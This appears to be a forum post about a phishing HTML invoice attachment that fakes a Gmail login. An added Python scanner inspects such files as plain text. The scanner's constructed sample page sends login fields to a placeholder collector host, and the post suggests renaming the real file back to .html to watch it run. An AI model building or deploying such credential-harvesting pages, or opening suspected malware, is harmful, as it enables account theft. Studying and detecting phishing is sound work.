See this link:
It was sent to my mother in an email as an html attachment last night. I have changed the file extension from .html to .txt so it shouldn't present any danger. I have no knowledge of html syntax so I don't really know what it is trying to do, but it looks like when you click on it intending to open the 'OUTSTANDING INVOICE' it will instead spawn a mockup of the gmail login page to trick you into entering your gmail account credentials, which presumably get forwarded on to whoever wrote the malware. She opened it originally on her Android phone so it downloaded the html file rather than opening it, and anyway she doesn't have a gmail account, so I would be inclined to think that no harm was done. This morning, however, our internet connection was down, which is very unusual, and I had to power-cycle the modem/router to get it back. This may be a coincidence but it makes me wonder if the malware did something more. She did say that when she clicked on it originally on her phone, a dialog popped up asking for access to her contacts, she thinks (not clear if it was her phone contacts or the contacts in her email account), which she granted. Now this may just have been to forward the malware on to all her (phone/email) contacts, which again wouldn't concern me overly.
To see it in action you can simply rename it from .txt to .html and click on it, but obviously if it does more than steal gmail credentials this would not be advised.
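
Added example, not part of the original post: a way to inspect an attachment like this as plain text, without renaming it back to .html or opening it in a browser. It lists form targets, password fields, remote hosts and common script obfuscation calls. The sample markup and the `.example` hosts are constructed, and `scan` and `AttachmentScan` are names chosen here.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample standing in for a phishing attachment; not the file from the post.
SAMPLE = """<html><head><title>OUTSTANDING INVOICE</title>
<meta http-equiv="refresh" content="0; url=https://collector.example/next">
<script src="https://cdn.example/x.js"></script>
<script>document.write(unescape('%3Cb%3Ehi%3C/b%3E'));</script></head>
<body><form method="post" action="https://collector.example/save.php">
<input type="email" name="u"><input type="password" name="p">
</form></body></html>"""

OBFUSCATION = re.compile(r"\b(eval|unescape|atob|fromCharCode|document\.write)\b")
META_URL = re.compile(r"url\s*=\s*['\"]?([^'\"\s;]+)", re.I)

class AttachmentScan(HTMLParser):
    # Collects indicators from the markup; nothing is rendered or executed.
    def __init__(self):
        super().__init__()
        self.forms, self.remote, self.obfuscation = [], [], set()
        self.password_fields, self._in_script = 0, False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.forms.append(a.get("action", ""))       # where input is sent
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.password_fields += 1
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.remote += META_URL.findall(a.get("content", ""))
        elif tag in ("script", "iframe", "img") and urlparse(a.get("src", "")).netloc:
            self.remote.append(a["src"])                  # content loaded remotely
        self._in_script = tag == "script"

    def handle_endtag(self, tag):
        self._in_script = False

    def handle_data(self, data):
        if self._in_script:                               # inline script text only
            self.obfuscation.update(OBFUSCATION.findall(data))

def scan(html_text):
    s = AttachmentScan()
    s.feed(html_text)
    s.close()
    hosts = sorted({urlparse(u).netloc for u in s.forms + s.remote} - {""})
    return {"form_actions": s.forms, "password_fields": s.password_fields,
            "remote_hosts": hosts, "obfuscation": sorted(s.obfuscation),
            "credential_form": bool(s.forms) and s.password_fields > 0}
```

To run it on a saved file, pass the file's contents as text, for example `scan(open(path, encoding="utf-8", errors="replace").read())`, where `path` is wherever the renamed .txt copy was saved.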